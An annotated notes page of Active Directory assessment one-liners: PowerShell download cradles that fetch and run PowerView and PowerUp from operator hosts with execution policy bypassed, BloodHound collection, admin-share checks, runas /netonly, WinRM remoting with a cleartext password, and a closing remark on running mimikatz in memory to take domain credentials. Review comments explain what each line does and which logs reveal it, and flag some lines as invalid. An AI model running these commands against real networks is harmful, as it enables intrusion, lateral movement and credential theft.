# Notes page of one-liners from an Active Directory assessment. The interpreters are mixed:
# line 1 is a host shell command, lines 2-4 are PowerShell launched from a host shell,
# lines 7-9 are cmd.exe, the rest run inside PowerShell. The comments are review notes on
# what each line does and how it is visible to the defending side.

# Ad-hoc HTTP file server on port 80 on the operator host (presumably the 10.10.10.10 the
# next two lines fetch from — not stated on this page). NOTE(review): as written this is not
# a valid invocation; the module form is `python -m SimpleHTTPServer 80` (Python 2 — Python 3
# ships it as `http.server`).
python -SimpleHTTPServer 80
# Download cradle: -nop (no profile), -exec bypass (ExecutionPolicy Bypass) and IEX over a
# WebClient call. This flag/cmdlet combination in a single command line is one of the most
# commonly signatured patterns in command-line auditing and Script Block logging.
# NOTE(review): DownloadFile is given one argument here but two on the next line, and it
# writes to disk rather than returning the script, so IEX has nothing to evaluate — verify
# which call was intended.
Powershell.exe -nop -exec bypass -c "IEX (New-Object System.Net.WebClient).Downloadfile('http://10.10.10.10/file.txt');"
# Fetches PowerView.ps1 and writes it to C:\tmp. Unlike in-memory loading, the file on disk
# is exposed to on-access scanning and file-creation telemetry.
Powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadFile('http://10.10.10.10/PowerView.ps1','C:\tmp\PowerView.ps1');"
# Interactive PowerShell with the execution policy bypassed. Execution policy is not a
# security boundary; the controls that matter are Script Block / Module logging,
# transcription and AMSI, not the policy itself.
Powershell -exec bypass
# Load the SharpHound collector (the PowerShell ingestor for BloodHound).
Import-module sharphound.ps1
# Collection run using the ACL, ObjectProps and Default methods; -SkipPing skips the
# reachability check per host, -CompressData zips the output. This presumably produces a
# burst of LDAP queries against the domain controller and, for the Default set, SMB
# connections to many hosts in a short window — a noisy pattern in LDAP/SMB telemetry.
Invoke-BloodHound -CollectionMethod ACL,ObjectProps,Default -CompressData -SkipPing
# Directory listing of BOX01's C$ admin share — effectively a test of whether the current
# token has admin rights on BOX01. On the target this appears as a network logon (4624,
# logon type 3) plus share-access events (5140/5145) for C$.
dir \\BOX01\c$\
# runas /netonly: the spawned process keeps the caller's local token and uses the supplied
# credentials only for network authentication, so `whoami` in the new shell still shows the
# original user and the credential is validated only when a remote connection is made.
# Locally the usual trace is a 4648 (logon with explicit credentials) event.
# NOTE(review): this line lacks the `/user:` prefix that the next line uses.
runas /netonly /FQDN\user cmd.exe
runas /netonly /user:customer\ank powershell
# PowerShell Remoting (WinRM) to BOX01; needs a WinRM listener and remote-management rights
# there. On the remote host the session is hosted by wsmprovhost.exe, which is a standard
# hunting pivot for remoting-based lateral movement.
Invoke-Command -ComputerName BOX01 -Scriptblock {hostname}
# Same remoting call with an explicit PSCredential. The password is passed in clear text on
# the command line, so it is captured by process-creation auditing with command-line logging
# (4688), PSReadLine history and any transcript; ConvertTo-SecureString -AsPlainText -Force
# does not change that, it only wraps the already-exposed string.
$username = 'DOMAIN\USERNAME'; $password = 'PASSWORD'; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword; Invoke-Command -ComputerName BOX01 -Credential $credential -ScriptBlock {hostname};
Find-LocalAdminAccess enumerates the machines on which the current user is a local administrator. This can be very useful, as you can then remotely execute tools such as mimikatz on those boxes straight into memory to obtain the credentials of domain users. If you need an overview of which groups and users are local admins on every box in the environment, use Invoke-EnumerateLocalAdmin.
Add Invoke-AllChecks at the bottom of the file. This makes the PowerShell script execute that function straight into memory once the string has been downloaded. This works for any function inside a PowerShell script:
Powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks"